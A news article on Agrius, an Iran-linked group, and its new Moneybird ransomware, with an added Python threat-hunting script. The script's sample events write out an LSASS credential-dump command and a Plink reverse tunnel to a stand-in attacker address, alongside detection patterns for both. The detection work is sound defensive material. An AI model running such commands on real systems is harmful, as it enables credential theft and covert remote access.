Security researchers have identified a hacking campaign run by an Iranian state-aligned group targeting organisations in Israel with a previously unseen ransomware strain.
The Check Point Incident Response Team (CPIRT) spotted the new variant when responding to a ransomware attack on a client. Dubbed Moneybird by the hackers, the CPIRT found that while the software was new, the operators were likely the Agrius group based on other tactics, techniques, and procedures.
The group had previously utilised a custom ransomware called Apostle, but Check Point believes Moneybird — written in C++ — is part of an effort to evolve Agrius’ offensive capabilities.
Agrius’ infection chain begins with the exploitation of vulnerabilities in public-facing web servers. From there, the threat actor drops a number of variants of the ASPXSpy webshell, hidden inside files that appear to be plain text files.
The group also uses a number of openly available platforms, notably SoftPerfect Network Scanner for scanning networks, Plink to manage traffic from a VPS owned by the actor, ProcDump to harvest credentials, and FileZilla to exfiltrate files once they’re compressed.
Agrius also uses a couple of legitimate file-hosting sites in the deployment of its software.
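The chain described above (a webshell disguised as a text file on an exploited web server, an IIS worker spawning tooling, ProcDump used against LSASS, and a Plink reverse tunnel to an attacker VPS) can be hunted with a few rules over file and process-creation telemetry. The following is an added example written for this page; it is not code from Check Point or from the article, and the web-root files and process events it runs over are constructed samples, simplified from what Sysmon Event ID 1 or Windows 4688 would provide. The ProcDump (`-ma`, `-accepteula`) and Plink (`-R`, `-N`, `-pw`) switches are the tools’ real flags; the IP address is a documentation address and the file paths and rule names are assumptions.

```python
"""Hunt for the Agrius tradecraft described above on constructed sample data."""
import re
from pathlib import PureWindowsPath

# Constructed sample: files under the web root as (path -> leading content).
# The 'cert.txt' entry models a webshell hiding behind a text-file name.
SAMPLE_WEB_FILES = {
    r"C:\inetpub\wwwroot\readme.txt": "Welcome to the site. Contact admin for help.",
    r"C:\inetpub\wwwroot\uploads\cert.txt":
        '<%@ Page Language="C#" Debug="true" %><script runat="server">',
    r"C:\inetpub\wwwroot\default.aspx": '<%@ Page Language="C#" %><html>',
}

# Constructed sample process-creation events (simplified Sysmon EID 1 fields).
# 203.0.113.10 is a documentation (TEST-NET-3) address, not a real server.
SAMPLE_PROCESS_EVENTS = [
    {"image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "parent": "services.exe"},
    {"image": r"C:\Temp\pd.exe",  # renamed ProcDump
     "cmdline": "pd.exe -accepteula -ma lsass.exe out.dmp", "parent": "cmd.exe"},
    {"image": r"C:\Temp\plink.exe",
     "cmdline": "plink.exe -N -R 0.0.0.0:3389:127.0.0.1:3389 user@203.0.113.10 -pw x",
     "parent": "w3wp.exe"},
    {"image": r"C:\Program Files\FileZilla\filezilla.exe",
     "cmdline": "filezilla.exe", "parent": "w3wp.exe"},
]

# An ASP.NET page directive or server-side script block inside a file whose
# extension is not a server-script extension is a webshell wearing a disguise.
ASPX_MARKERS = re.compile(r'<%@\s*Page|runat\s*=\s*"server"', re.IGNORECASE)
SCRIPT_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp", ".ascx"}


def find_webshell_text_files(files):
    """Return paths whose content is ASP.NET code but whose extension is not."""
    hits = []
    for path, content in files.items():
        ext = PureWindowsPath(path).suffix.lower()
        if ext not in SCRIPT_EXTENSIONS and ASPX_MARKERS.search(content):
            hits.append(path)
    return hits


# Process rules match on the command line rather than the image name, because
# a renamed ProcDump or Plink binary keeps its arguments.
LSASS_TARGET = re.compile(r"\blsass(\.exe)?\b", re.IGNORECASE)
PROCDUMP_DUMP_FLAG = re.compile(r"(^|\s)-m[am]\b", re.IGNORECASE)   # -ma / -mm
# Plink/ssh port forward: -R or -L [listen_addr:]port:host:port
PLINK_FORWARD = re.compile(r"(^|\s)-[RL]\s+(\S+:)?\d+:\S+:\d+")
IIS_WORKER = "w3wp.exe"
# Children the IIS worker legitimately spawns (assumed baseline; tune per host).
EXPECTED_IIS_CHILDREN = {"csc.exe", "cvtres.exe", "conhost.exe"}


def flag_process_events(events):
    """Return (rule_name, image_name) pairs for every matching event."""
    findings = []
    for ev in events:
        cmd = ev["cmdline"]
        image = PureWindowsPath(ev["image"]).name.lower()
        if LSASS_TARGET.search(cmd) and PROCDUMP_DUMP_FLAG.search(cmd):
            findings.append(("lsass_memory_dump", image))
        if PLINK_FORWARD.search(cmd):
            findings.append(("ssh_port_forward", image))
        if ev["parent"].lower() == IIS_WORKER and image not in EXPECTED_IIS_CHILDREN:
            findings.append(("iis_worker_spawned_process", image))
    return findings


if __name__ == "__main__":
    for path in find_webshell_text_files(SAMPLE_WEB_FILES):
        print("webshell_in_text_file", path)
    for rule, image in flag_process_events(SAMPLE_PROCESS_EVENTS):
        print(rule, image)
```

The IIS-worker rule is the most robust of the four: whatever the webshell is called, commands issued through it run as children of w3wp.exe, which on a healthy server rarely spawns anything beyond the compiler helpers. The LSASS and port-forward rules are there to catch the renamed tooling that would otherwise slip past a hash or filename blocklist.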
Unusually, the Moneybird ransomware takes no command line parameters, instead relying upon a configuration blob embedded in the binary, likely tuned for the target’s environment. Reusing it against a different victim would therefore mean rebuilding the sample, which makes it poorly suited to deployment across multiple environments.
“Moneybird itself, although not particularly complex, has a number of intriguing features that appear to have been designed for specific targets,” Check Point’s researchers said in a blog post. “Some of these special features make the malware less practical for use in multiple unrelated campaigns. This emphasises the malware’s targeted nature, including the use of ‘targeted paths’, which, in the specific sample we analysed, makes the ransomware ignore most of the files on the target machine.”
Agrius itself has been operating since at least 2020 and is thought to be linked to the Iranian Ministry of Intelligence and Security. It operates mainly in the Middle East, with a focus on targets in Israel. The group operates under a number of aliases, including BlackShadow, and previously targeted the Israeli insurance company Shirbit and Bar-Ilan University.
David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.